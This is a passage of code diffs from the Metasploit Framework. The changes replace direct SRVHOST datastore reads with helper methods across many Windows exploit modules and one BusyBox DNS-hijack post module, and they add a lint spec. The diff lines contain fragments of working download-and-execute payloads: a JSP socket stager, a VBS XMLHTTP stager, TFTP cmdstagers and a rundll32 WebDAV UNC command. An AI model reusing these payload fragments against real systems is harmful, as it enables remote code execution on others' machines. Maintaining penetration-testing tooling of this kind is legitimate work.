+    tftphost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address : srvhost
     execute_cmdstager({ temp: '.', tftphost: tftphost })
     @payload_exe = generate_payload_exe
 

--- a/modules/exploits/windows/http/sap_host_control_cmd_exec.rb
+++ b/modules/exploits/windows/http/sap_host_control_cmd_exec.rb
@@ -403,9 +403,7 @@ class MetasploitModule < Msf::Exploit::Remote
     @extensions = "exe"
     @system_commands_file = rand_text_alpha_lower(4)
 
-    myhost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : srvhost
-
-    @exploit_unc = "\\\\#{myhost}\\"
+    @exploit_unc = "\\\\#{srvhost_addr}\\"
 
     if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/'
       fail_with(Failure::Unknown, 'Using WebDAV requires SRVPORT=80 and URIPATH=/')

--- a/modules/exploits/windows/http/sap_host_control_cmd_exec.rb
+++ b/modules/exploits/windows/http/sap_host_control_cmd_exec.rb
@@ -403,7 +403,7 @@ class MetasploitModule < Msf::Exploit::Remote
     @extensions = "exe"
     @system_commands_file = rand_text_alpha_lower(4)
 
-    myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST']
+    myhost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : srvhost
 
     @exploit_unc = "\\\\#{myhost}\\"
 

--- a/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb
+++ b/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb
@@ -117,7 +117,7 @@ class MetasploitModule < Msf::Exploit::Remote
   # Generate a download+exe JSP payload
   #
   def generate_jsp_payload
-    my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address("50.50.50.50") : datastore['SRVHOST']
+    my_host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address("50.50.50.50") : srvhost
     my_port = datastore['SRVPORT']
 
     # tmp folder = C:\Program Files\SolarWinds\Storage Manager Server\temp\
@@ -237,7 +237,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     begin
       t = framework.threads.spawn("reqs", false) { inject_exec }
-      print_status("Serving executable on #{datastore['SRVHOST']}:#{datastore['SRVPORT']}")
+      print_status("Serving executable on #{srvhost}:#{datastore['SRVPORT']}")
       super
     ensure
       t.kill

--- a/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb
+++ b/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb
@@ -117,9 +117,6 @@ class MetasploitModule < Msf::Exploit::Remote
   # Generate a download+exe JSP payload
   #
   def generate_jsp_payload
-    my_host = srvhost_addr
-    my_port = srvport
-
     # tmp folder = C:\Program Files\SolarWinds\Storage Manager Server\temp\
     # This will download our malicious executable in base64 format, decode it back,
     # save it as a temp file, and then finally execute it.
@@ -133,7 +130,7 @@ class MetasploitModule < Msf::Exploit::Remote
     byte[] shellcode = null;
     BufferedOutputStream outstream = null;
     try {
-      Socket s = new Socket("#{my_host}", #{my_port});
+      Socket s = new Socket("#{srvhost_addr}", #{srvport});
       BufferedReader r = new BufferedReader(new InputStreamReader(s.getInputStream()));
       while (buf.length() < #{@native_payload.length}) {
         buf.append( (char) r.read());

--- a/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb
+++ b/modules/exploits/windows/http/solarwinds_storage_manager_sql.rb
@@ -117,8 +117,8 @@ class MetasploitModule < Msf::Exploit::Remote
   # Generate a download+exe JSP payload
   #
   def generate_jsp_payload
-    my_host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address("50.50.50.50") : srvhost
-    my_port = datastore['SRVPORT']
+    my_host = srvhost_addr
+    my_port = srvport
 
     # tmp folder = C:\Program Files\SolarWinds\Storage Manager Server\temp\
     # This will download our malicious executable in base64 format, decode it back,
@@ -237,7 +237,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     begin
       t = framework.threads.spawn("reqs", false) { inject_exec }
-      print_status("Serving executable on #{srvhost}:#{datastore['SRVPORT']}")
+      print_status("Serving executable on #{Rex::Socket.to_authority(bindhost, bindport)}")
       super
     ensure
       t.kill

--- a/modules/exploits/windows/iis/ms01_026_dbldecode.rb
+++ b/modules/exploits/windows/iis/ms01_026_dbldecode.rb
@@ -179,12 +179,11 @@ class MetasploitModule < Msf::Exploit::Remote
         print_error('No reply')
       end
     when :win_dropper
-      tftphost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address : srvhost
       execute_cmdstager(
         temp: '.',
         linemax: 1_400,
         cgifname: @cmd_exe_fname,
-        tftphost: tftphost,
+        tftphost: srvhost_addr,
         # Force noconcat so we can skip the "start" command in execute_command method
         noconcat: true,
         # We can't delete the payload while it is running, so don't try

--- a/modules/exploits/windows/iis/ms01_026_dbldecode.rb
+++ b/modules/exploits/windows/iis/ms01_026_dbldecode.rb
@@ -179,7 +179,7 @@ class MetasploitModule < Msf::Exploit::Remote
         print_error('No reply')
       end
     when :win_dropper
-      tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
+      tftphost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address : srvhost
       execute_cmdstager(
         temp: '.',
         linemax: 1_400,

--- a/modules/exploits/windows/iis/msadc.rb
+++ b/modules/exploits/windows/iis/msadc.rb
@@ -344,8 +344,7 @@ class MetasploitModule < Msf::Exploit::Remote
       res = exec_cmd(y, "cmd /c copy cmd.exe \\inetpub\\scripts\\#{exe_fname}", z)
 
       # Use the CMD stager to get a payload running
-      tftphost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address : srvhost
-      execute_cmdstager({ temp: '.', tftphost: tftphost, linemax: 1_400, cgifname: exe_fname, noconcat: true })
+      execute_cmdstager({ temp: '.', tftphost: srvhost_addr, linemax: 1_400, cgifname: exe_fname, noconcat: true })
 
       # Save these file names for later deletion
       @exe_cmd_copy = exe_fname

--- a/modules/exploits/windows/iis/msadc.rb
+++ b/modules/exploits/windows/iis/msadc.rb
@@ -344,7 +344,7 @@ class MetasploitModule < Msf::Exploit::Remote
       res = exec_cmd(y, "cmd /c copy cmd.exe \\inetpub\\scripts\\#{exe_fname}", z)
 
       # Use the CMD stager to get a payload running
-      tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
+      tftphost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address : srvhost
       execute_cmdstager({ temp: '.', tftphost: tftphost, linemax: 1_400, cgifname: exe_fname, noconcat: true })
 
       # Save these file names for later deletion

--- a/modules/exploits/windows/misc/altiris_ds_sqli.rb
+++ b/modules/exploits/windows/misc/altiris_ds_sqli.rb
@@ -178,8 +178,7 @@ Processor-Speed=#{processor_speed}
     # CmdStagerVBS was tested here as well, however delivery took roughly
     # 30 minutes and required sending almost 350 notification messages.
     # size constraint requirement for SQLi is: linemax => 393
-    tftphost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address : srvhost
-    execute_cmdstager({ delay: 1.5, tftphost: tftphost, temp: '%TEMP%\\', flavor: :tftp })
+    execute_cmdstager({ delay: 1.5, tftphost: srvhost_addr, temp: '%TEMP%\\', flavor: :tftp })
   end
 
   def on_new_session(client)

--- a/modules/exploits/windows/misc/altiris_ds_sqli.rb
+++ b/modules/exploits/windows/misc/altiris_ds_sqli.rb
@@ -178,7 +178,7 @@ Processor-Speed=#{processor_speed}
     # CmdStagerVBS was tested here as well, however delivery took roughly
     # 30 minutes and required sending almost 350 notification messages.
     # size constraint requirement for SQLi is: linemax => 393
-    tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
+    tftphost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address : srvhost
     execute_cmdstager({ delay: 1.5, tftphost: tftphost, temp: '%TEMP%\\', flavor: :tftp })
   end
 

--- a/modules/exploits/windows/misc/hp_dataprotector_install_service.rb
+++ b/modules/exploits/windows/misc/hp_dataprotector_install_service.rb
@@ -112,7 +112,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("File available on #{unc}...")
     vprint_status("#{peer} - Trying to execute remote EXE...")
 
-    lhost = "#{datastore['SRVHOST']}"
+    lhost = "#{srvhost}"
     lhostfull = ""
     lhost.each_char do |character|
       lhostfull = lhostfull << "\x00" << character

--- a/modules/exploits/windows/misc/hp_dataprotector_install_service.rb
+++ b/modules/exploits/windows/misc/hp_dataprotector_install_service.rb
@@ -112,7 +112,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("File available on #{unc}...")
     vprint_status("#{peer} - Trying to execute remote EXE...")
 
-    lhost = "#{srvhost}"
+    lhost = "#{srvhost_addr}"
     lhostfull = ""
     lhost.each_char do |character|
       lhostfull = lhostfull << "\x00" << character

--- a/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb
+++ b/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb
@@ -269,7 +269,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def primer
     basename = rand_text_alpha(3)
     share_name = rand_text_alpha(3)
-    myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
+    myhost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address : srvhost
     exploit_unc = "\\\\#{myhost}\\"
 
     vprint_status("Payload available at #{exploit_unc}#{share_name}\\#{basename}.dll")

--- a/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb
+++ b/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb
@@ -269,8 +269,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def primer
     basename = rand_text_alpha(3)
     share_name = rand_text_alpha(3)
-    myhost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address : srvhost
-    exploit_unc = "\\\\#{myhost}\\"
+    exploit_unc = "\\\\#{srvhost_addr}\\"
 
     vprint_status("Payload available at #{exploit_unc}#{share_name}\\#{basename}.dll")
 

--- a/modules/exploits/windows/misc/mini_stream.rb
+++ b/modules/exploits/windows/misc/mini_stream.rb
@@ -73,8 +73,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def on_request_uri(cli, request)
     # Calculate the correct offset
-    host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
-    host << ":#{datastore['SRVPORT']}/"
+    host = "#{Rex::Socket.to_authority(srvhost_addr, srvport)}/"
     offset = target['Offset'] - host.length
 
     # Construct our buffer

--- a/modules/exploits/windows/misc/mini_stream.rb
+++ b/modules/exploits/windows/misc/mini_stream.rb
@@ -73,7 +73,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def on_request_uri(cli, request)
     # Calculate the correct offset
-    host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
     host << ":#{datastore['SRVPORT']}/"
     offset = target['Offset'] - host.length
 

--- a/modules/exploits/windows/misc/nvidia_mental_ray.rb
+++ b/modules/exploits/windows/misc/nvidia_mental_ray.rb
@@ -129,15 +129,10 @@ class MetasploitModule < Msf::Exploit::Remote
   def create_listen_port
     port = datastore['LISTEN_PORT']
 
-    comm = datastore['ListenerComm']
-    if comm == "local"
-      comm = ::Rex::Socket::Comm::Local
-    else
-      comm = nil
-    end
+    comm = _determine_server_comm(bindhost)
 
     @listener = Rex::Socket::TcpServer.create(
-      'LocalHost' => srvhost,
+      'LocalHost' => bindhost,
       'LocalPort' => port,
       'Comm' => comm,
       'Context' => {

--- a/modules/exploits/windows/misc/nvidia_mental_ray.rb
+++ b/modules/exploits/windows/misc/nvidia_mental_ray.rb
@@ -137,7 +137,7 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     @listener = Rex::Socket::TcpServer.create(
-      'LocalHost' => datastore['SRVHOST'],
+      'LocalHost' => srvhost,
       'LocalPort' => port,
       'Comm' => comm,
       'Context' => {

--- a/modules/exploits/windows/misc/vmhgfs_webdav_dll_sideload.rb
+++ b/modules/exploits/windows/misc/vmhgfs_webdav_dll_sideload.rb
@@ -80,9 +80,6 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def process_get(cli, request)
-    myhost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
-    webdav = "\\\\#{myhost}\\"
-
     if (request.uri =~ /vmhgfs\.dll$/i)
       print_status("GET => DLL Payload (#{request.uri})")
       return if ((p = regenerate_payload(cli)) == nil)
@@ -139,13 +136,8 @@ class MetasploitModule < Msf::Exploit::Remote
   def process_propfind(cli, request)
     path = request.uri
     print_status("PROPFIND #{path}")
-    body = ''
-
-    my_host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
-    my_uri = "http://#{my_host}/"
 
     if path !~ /\/$/
-
       if blacklisted_path?(path)
         print_status "PROPFIND => 404 (#{path})"
         resp = create_response(404, "Not Found")
@@ -340,9 +332,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    myhost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : srvhost
-
-    @exploit_unc = "\\\\#{myhost}\\"
+    @exploit_unc = "\\\\#{srvhost_addr}\\"
 
     if datastore['SRVPORT'].to_i != 80 || datastore['URIPATH'] != '/'
       fail_with(Failure::Unknown, 'Using WebDAV requires SRVPORT=80 and URIPATH=/')

--- a/modules/exploits/windows/misc/vmhgfs_webdav_dll_sideload.rb
+++ b/modules/exploits/windows/misc/vmhgfs_webdav_dll_sideload.rb
@@ -80,7 +80,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def process_get(cli, request)
-    myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    myhost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
     webdav = "\\\\#{myhost}\\"
 
     if (request.uri =~ /vmhgfs\.dll$/i)
@@ -141,7 +141,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("PROPFIND #{path}")
     body = ''
 
-    my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
+    my_host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : srvhost
     my_uri = "http://#{my_host}/"
 
     if path !~ /\/$/
@@ -340,7 +340,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    myhost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST']
+    myhost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : srvhost
 
     @exploit_unc = "\\\\#{myhost}\\"
 

--- a/modules/exploits/windows/misc/webdav_delivery.rb
+++ b/modules/exploits/windows/misc/webdav_delivery.rb
@@ -58,9 +58,9 @@ class MetasploitModule < Msf::Exploit::Remote
       if datastore['SRVPORT'] != 443
         fail_with(Failure::BadConfig, 'SRVPORT must be 443')
       end
-      webdav = "#{srvhost}@ssl"
+      webdav = "#{srvhost_addr}@ssl"
     else
-      webdav = "#{srvhost}@#{datastore['SRVPORT']}"
+      webdav = "#{srvhost_addr}@#{datastore['SRVPORT']}"
     end
     print_line("rundll32.exe \\\\#{webdav}\\ANYTHING,Init")
   end

--- a/modules/exploits/windows/misc/webdav_delivery.rb
+++ b/modules/exploits/windows/misc/webdav_delivery.rb
@@ -58,9 +58,9 @@ class MetasploitModule < Msf::Exploit::Remote
       if datastore['SRVPORT'] != 443
         fail_with(Failure::BadConfig, 'SRVPORT must be 443')
       end
-      webdav = "#{datastore['SRVHOST']}@ssl"
+      webdav = "#{srvhost}@ssl"
     else
-      webdav = "#{datastore['SRVHOST']}@#{datastore['SRVPORT']}"
+      webdav = "#{srvhost}@#{datastore['SRVPORT']}"
     end
     print_line("rundll32.exe \\\\#{webdav}\\ANYTHING,Init")
   end

--- a/modules/exploits/windows/mssql/mssql_payload.rb
+++ b/modules/exploits/windows/mssql/mssql_payload.rb
@@ -113,7 +113,7 @@ class MetasploitModule < Msf::Exploit::Remote
     method = datastore['METHOD'].downcase
 
     if (method =~ /^cmd/)
-      tftphost = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
+      tftphost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address : srvhost
       execute_cmdstager({ linemax: 1500, tftphost: tftphost, nodelete: true })
     else
       # Generate the EXE, this is the same no matter what delivery mechanism we use

--- a/modules/exploits/windows/mssql/mssql_payload.rb
+++ b/modules/exploits/windows/mssql/mssql_payload.rb
@@ -113,8 +113,7 @@ class MetasploitModule < Msf::Exploit::Remote
     method = datastore['METHOD'].downcase
 
     if (method =~ /^cmd/)
-      tftphost = (srvhost == '0.0.0.0') ? Rex::Socket.source_address : srvhost
-      execute_cmdstager({ linemax: 1500, tftphost: tftphost, nodelete: true })
+      execute_cmdstager({ linemax: 1500, tftphost: srvhost_addr, nodelete: true })
     else
       # Generate the EXE, this is the same no matter what delivery mechanism we use
       exe = generate_payload_exe

--- a/modules/exploits/windows/novell/netiq_pum_eval.rb
+++ b/modules/exploits/windows/novell/netiq_pum_eval.rb
@@ -138,15 +138,6 @@ class MetasploitModule < Msf::Exploit::Remote
     @exe_sent = true
   end
 
-  def lookup_lhost()
-    # Get the source address
-    if srvhost == '0.0.0.0'
-      Rex::Socket.source_address('50.50.50.50')
-    else
-      srvhost
-    end
-  end
-
   def fake_login
     data = "\x00\x00\x00\x00\x00\x01\x00\x15\x53\x50\x46\x2e\x55\x74"          #  ..........SPF.Ut
     data << "\x69\x6c\x2e\x63\x61\x6c\x6c\x4d\x6f\x64\x75\x6c\x65\x45\x78\x00" #  il.callModuleEx.
@@ -193,7 +184,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_status("Setting up the Web Service...")
     datastore['SSL'] = false
     resource_uri = '/' + exename + '.exe'
-    service_url = "http://#{lookup_lhost}:#{datastore['SRVPORT']}#{resource_uri}"
+    service_url = "http://#{Rex::Socket.to_authority(srvhost_addr, srvport)}#{resource_uri}"
     print_status("Starting up our web service on #{service_url} ...")
     start_service({
       'Uri' => {

--- a/modules/exploits/windows/novell/netiq_pum_eval.rb
+++ b/modules/exploits/windows/novell/netiq_pum_eval.rb
@@ -140,10 +140,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def lookup_lhost()
     # Get the source address
-    if datastore['SRVHOST'] == '0.0.0.0'
+    if srvhost == '0.0.0.0'
       Rex::Socket.source_address('50.50.50.50')
     else
-      datastore['SRVHOST']
+      srvhost
     end
   end
 

--- a/modules/exploits/windows/scada/ge_proficy_cimplicity_gefebt.rb
+++ b/modules/exploits/windows/scada/ge_proficy_cimplicity_gefebt.rb
@@ -202,7 +202,7 @@ class MetasploitModule < Msf::Exploit::Remote
   def setup_resources
     if datastore['UNCPATH'].blank?
       # Using WebDAV
-      my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : datastore['SRVHOST']
+      my_host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : srvhost
       @basename = rand_text_alpha(3)
       @share_name = rand_text_alpha(3)
       @exploit_unc = "\\\\#{my_host}\\"

--- a/modules/exploits/windows/scada/ge_proficy_cimplicity_gefebt.rb
+++ b/modules/exploits/windows/scada/ge_proficy_cimplicity_gefebt.rb
@@ -202,10 +202,9 @@ class MetasploitModule < Msf::Exploit::Remote
   def setup_resources
     if datastore['UNCPATH'].blank?
       # Using WebDAV
-      my_host = (srvhost == '0.0.0.0') ? Rex::Socket.source_address('50.50.50.50') : srvhost
       @basename = rand_text_alpha(3)
       @share_name = rand_text_alpha(3)
-      @exploit_unc = "\\\\#{my_host}\\"
+      @exploit_unc = "\\\\#{srvhost_addr}\\"
       @exe_filename = "#{rand_text_alpha(3 + rand(4))}.exe"
       unless datastore['SRVPORT'].to_i == 80 && datastore['URIPATH'] == '/'
         fail_with(Failure::BadConfig, 'Using WebDAV requires SRVPORT=80 and URIPATH=/')

--- a/modules/exploits/windows/scada/rockwell_factorytalk_rce.rb
+++ b/modules/exploits/windows/scada/rockwell_factorytalk_rce.rb
@@ -185,7 +185,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_good("#{peer} - Got a path to drop our shell: #{shell_path}")
 
     # Start http server for project copy callback
-    http_service = "http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}"
+    http_service = "http://#{srvhost}:#{datastore['SRVPORT']}"
     print_status("#{peer} - Starting up our web service on #{http_service} ...")
 
     start_service({
@@ -214,7 +214,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Project Copy Request: target will connect to us to obtain project information.
     print_status("#{peer} - Initiating project copy request...")
-    url = "/hmi_isapi.dll?StartRemoteProjectCopy&#{@proj_name}&#{rand_text_alpha(5..13)}&#{datastore['SRVHOST']}:#{datastore['SRVPORT']}&1"
+    url = "/hmi_isapi.dll?StartRemoteProjectCopy&#{@proj_name}&#{rand_text_alpha(5..13)}&#{srvhost}:#{datastore['SRVPORT']}&1"
     res = send_to_factory(url)
 
     # wait up to datastore['SLEEP_RACER'] seconds for the racer thread to finish

--- a/modules/exploits/windows/scada/rockwell_factorytalk_rce.rb
+++ b/modules/exploits/windows/scada/rockwell_factorytalk_rce.rb
@@ -66,7 +66,6 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         Opt::RPORT(80),
-        OptString.new('SRVHOST', [true, 'IP address of the host serving the exploit']),
         OptInt.new('SRVPORT', [true, 'Port of the host serving the exploit on', 8080]),
         OptString.new('TARGETURI', [true, 'The base path to Rockwell FactoryTalk', '/rsviewse/'])
       ]
@@ -185,8 +184,7 @@ class MetasploitModule < Msf::Exploit::Remote
     print_good("#{peer} - Got a path to drop our shell: #{shell_path}")
 
     # Start http server for project copy callback
-    http_service = "http://#{srvhost}:#{datastore['SRVPORT']}"
-    print_status("#{peer} - Starting up our web service on #{http_service} ...")
+    print_status("#{peer} - Starting up our web service on http://#{Rex::Socket.to_authority(bindhost, bindport)}/...")
 
     start_service({
       'Uri' => {
@@ -214,7 +212,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # Project Copy Request: target will connect to us to obtain project information.
     print_status("#{peer} - Initiating project copy request...")
-    url = "/hmi_isapi.dll?StartRemoteProjectCopy&#{@proj_name}&#{rand_text_alpha(5..13)}&#{srvhost}:#{datastore['SRVPORT']}&1"
+    url = "/hmi_isapi.dll?StartRemoteProjectCopy&#{@proj_name}&#{rand_text_alpha(5..13)}&#{srvhost_addr}:#{datastore['SRVPORT']}&1"
     res = send_to_factory(url)
 
     # wait up to datastore['SLEEP_RACER'] seconds for the racer thread to finish

--- a/modules/exploits/windows/scada/scadapro_cmdexe.rb
+++ b/modules/exploits/windows/scada/scadapro_cmdexe.rb
@@ -101,10 +101,10 @@ class MetasploitModule < Msf::Exploit::Remote
     @payload_name = rand_text_alpha(4)
     @temp_folder = "C:/Windows/Temp"
 
-    if datastore['SRVHOST'] == '0.0.0.0'
+    if srvhost == '0.0.0.0'
       lhost = Rex::Socket.source_address('50.50.50.50')
     else
-      lhost = datastore['SRVHOST']
+      lhost = srvhost
     end
 
     payload_src = lhost

--- a/modules/exploits/windows/scada/scadapro_cmdexe.rb
+++ b/modules/exploits/windows/scada/scadapro_cmdexe.rb
@@ -74,7 +74,7 @@ class MetasploitModule < Msf::Exploit::Remote
     tmp = "#{@temp_folder}/#{stager_name}"
 
     vbs = "echo Set #{name_xmlhttp} = CreateObject(\"Microsoft.XMLHTTP\") "
-    vbs << ": #{name_xmlhttp}.open \"GET\",\"http://#{url}\",False : #{name_xmlhttp}.send"
+    vbs << ": #{name_xmlhttp}.open \"GET\",\"#{url}\",False : #{name_xmlhttp}.send"
     vbs << ": Set #{name_adodb} = CreateObject(\"ADODB.Stream\") "
     vbs << ": #{name_adodb}.Open : #{name_adodb}.Type=1 "
     vbs << ": #{name_adodb}.Write #{name_xmlhttp}.responseBody "
@@ -101,14 +101,10 @@ class MetasploitModule < Msf::Exploit::Remote
     @payload_name = rand_text_alpha(4)
     @temp_folder = "C:/Windows/Temp"
 
-    if srvhost == '0.0.0.0'
-      lhost = Rex::Socket.source_address('50.50.50.50')
-    else
-      lhost = srvhost
-    end
-
-    payload_src = lhost
-    payload_src << ":#{datastore['SRVPORT']}#{datastore['URIPATH']}#{@payload_name}.exe"
+    payload_src = "http://#{Rex::Socket.to_authority(srvhost_addr, srvport)}/"
+    payload_src << datastore['URIPATH'].delete_prefix('/')
+    payload_src << '/' unless payload_src.end_with?('/')
+    payload_src << "#{@payload_name}.exe"
 
     stager_name = rand_text_alpha(6) + ".vbs"
     stager = build_vbs(payload_src, stager_name)

--- a/modules/payloads/singles/java/shell_reverse_tcp.rb
+++ b/modules/payloads/singles/java/shell_reverse_tcp.rb
@@ -4,7 +4,7 @@
 ##
 
 module MetasploitModule
-  CachedSize = 7497
+  CachedSize = 7500
 
   include Msf::Payload::Single
   include Msf::Payload::Java

--- a/modules/payloads/stagers/java/bind_tcp.rb
+++ b/modules/payloads/stagers/java/bind_tcp.rb
@@ -4,7 +4,7 @@
 ##
 
 module MetasploitModule
-  CachedSize = 5256
+  CachedSize = 5259
 
   include Msf::Payload::Stager
   include Msf::Payload::Java

--- a/modules/payloads/stagers/java/reverse_tcp.rb
+++ b/modules/payloads/stagers/java/reverse_tcp.rb
@@ -4,7 +4,7 @@
 ##
 
 module MetasploitModule
-  CachedSize = 5256
+  CachedSize = 5259
 
   include Msf::Payload::Stager
   include Msf::Payload::Java

--- a/modules/post/linux/busybox/set_dns.rb
+++ b/modules/post/linux/busybox/set_dns.rb
@@ -41,7 +41,7 @@ class MetasploitModule < Msf::Post
 
   def modify_resolv_conf
     print_status('File /etc/resolv.conf found')
-    if busy_box_write_file('/etc/resolv.conf', "nameserver #{srvhost}", false)
+    if busy_box_write_file('/etc/resolv.conf', "nameserver #{datastore['DNS']}", false)
       print_good('DNS server added to resolv.conf')
     end
   end
@@ -49,7 +49,7 @@ class MetasploitModule < Msf::Post
   def modify_udhcpd_conf
     print_status('File /etc/udhcpd.conf found')
 
-    if busy_box_write_file('/etc/udhcpd.conf', "option dns #{srvhost}", true)
+    if busy_box_write_file('/etc/udhcpd.conf', "option dns #{datastore['DNS']}", true)
       restart_dhcpd('/etc/udhcpd.conf')
     else
       print_status('Unable to write udhcpd.conf, searching a writable directory...')
@@ -59,7 +59,7 @@ class MetasploitModule < Msf::Post
         cmd_exec("cp -f /etc/udhcpd.conf #{writable_directory}tmp.conf")
         Rex.sleep(0.3)
         print_status("Adding DNS to #{writable_directory}tmp.conf")
-        busy_box_write_file("#{writable_directory}tmp.conf", "option dns #{srvhost}", true)
+        busy_box_write_file("#{writable_directory}tmp.conf", "option dns #{datastore['DNS']}", true)
         restart_dhcpd("#{writable_directory}tmp.conf")
       else
         print_error('Writable directory not found')

--- a/modules/post/linux/busybox/set_dns.rb
+++ b/modules/post/linux/busybox/set_dns.rb
@@ -41,7 +41,7 @@ class MetasploitModule < Msf::Post
 
   def modify_resolv_conf
     print_status('File /etc/resolv.conf found')
-    if busy_box_write_file('/etc/resolv.conf', "nameserver #{datastore['SRVHOST']}", false)
+    if busy_box_write_file('/etc/resolv.conf', "nameserver #{srvhost}", false)
       print_good('DNS server added to resolv.conf')
     end
   end
@@ -49,7 +49,7 @@ class MetasploitModule < Msf::Post
   def modify_udhcpd_conf
     print_status('File /etc/udhcpd.conf found')
 
-    if busy_box_write_file('/etc/udhcpd.conf', "option dns #{datastore['SRVHOST']}", true)
+    if busy_box_write_file('/etc/udhcpd.conf', "option dns #{srvhost}", true)
       restart_dhcpd('/etc/udhcpd.conf')
     else
       print_status('Unable to write udhcpd.conf, searching a writable directory...')
@@ -59,7 +59,7 @@ class MetasploitModule < Msf::Post
         cmd_exec("cp -f /etc/udhcpd.conf #{writable_directory}tmp.conf")
         Rex.sleep(0.3)
         print_status("Adding DNS to #{writable_directory}tmp.conf")
-        busy_box_write_file("#{writable_directory}tmp.conf", "option dns #{datastore['SRVHOST']}", true)
+        busy_box_write_file("#{writable_directory}tmp.conf", "option dns #{srvhost}", true)
         restart_dhcpd("#{writable_directory}tmp.conf")
       else
         print_error('Writable directory not found')

--- a/spec/rubocop/cop/lint/datastore_srvhost_usage_spec.rb
+++ b/spec/rubocop/cop/lint/datastore_srvhost_usage_spec.rb
@@ -1,0 +1,87 @@
+# frozen_string_literal: true
+
+require 'rubocop/cop/lint/datastore_srvhost_usage'
+require 'rubocop/rspec/support'
+
+RSpec.describe RuboCop::Cop::Lint::DatastoreSrvhostUsage, :config do
+  subject(:cop) { described_class.new(config) }
+
+  let(:config) { RuboCop::Config.new }
+
+  it 'corrects datastore[\'SRVHOST\'] with single quotes' do
+    expect_offense(<<~RUBY)
+      datastore['SRVHOST']
+      ^^^^^^^^^^^^^^^^^^^^ Lint/DatastoreSrvhostUsage: Use the `srvhost` method instead of directly accessing `datastore['SRVHOST']`.
+    RUBY
+
+    expect_correction(<<~RUBY)
+      srvhost
+    RUBY
+  end
+
+  it 'corrects datastore["SRVHOST"] with double quotes' do
+    expect_offense(<<~RUBY)
+      datastore["SRVHOST"]
+      ^^^^^^^^^^^^^^^^^^^^ Lint/DatastoreSrvhostUsage: Use the `srvhost` method instead of directly accessing `datastore['SRVHOST']`.
+    RUBY
+
+    expect_correction(<<~RUBY)
+      srvhost
+    RUBY
+  end
+
+  it 'corrects datastore[\'SRVHOST\'] in assignments' do
+    expect_offense(<<~RUBY)
+      host = datastore['SRVHOST']
